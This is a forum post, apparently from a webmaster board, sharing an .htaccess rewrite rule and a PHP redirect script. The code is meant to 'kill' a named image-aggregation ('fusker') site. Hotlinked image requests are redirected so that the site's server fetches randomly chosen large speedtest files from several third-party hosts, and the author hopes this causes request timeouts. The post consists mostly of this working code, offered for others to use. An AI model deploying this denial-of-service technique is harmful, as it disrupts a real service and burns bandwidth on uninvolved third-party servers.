|
|
|
|
|
|
![]() |
#17 |
Trying is the first step towards failure
|
johnnybg's post about redirecting to fusker itself has inspired me..
I think I have found a way to kill fusker.. ![]() .htaccess Code:
RewriteEngine on RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?YOURDOMAIN.COM [NC] RewriteRule \.(jpg|jpeg|png|gif)$ http://www.YOURDOMAIN.COM/fuckser.php [NC,R,L] Code:
<?php $payloads = array( "http://speed.mirror.sptel.com.au/10mb.dat", "http://www.truong-is.nl/speedtest/10mb.bin", "http://subscribers.aroundcarolina.com/bigtest.xyz", "http://www.ayksolutions.com/speedtest/10meg.file", "http://comxnet.dk/speed/1MB.bin", "http://speedtest.multikabel.net/10mb.bin", "http://ns0.multikabel.net/10mb.bin"); $kick = $payloads[rand(0,(count($payloads)-1))]; $url = "http://fusker.lewww.com/index.php?url=".urlencode($kick)."&method=images"; header("Location: $url"); ?> This code assumes the user fuskering your gallery is logged in. It will send a request to fusker.lewww.com to download one of those big files. It seems Fusker doesn't check if the page actually is a HTML page.. Do with this what you like, but if you decide to use it.. Let me know, would see to see 'request timeout' on fusker ![]()
__________________
Submit galleries/links | Trade Hardlnks | Free Forum Hosting | Build your own search engine | Sponsor scorecard |
![]() |
![]() |
Thread Tools | Search this Thread |
Display Modes | Rate This Thread |
|
|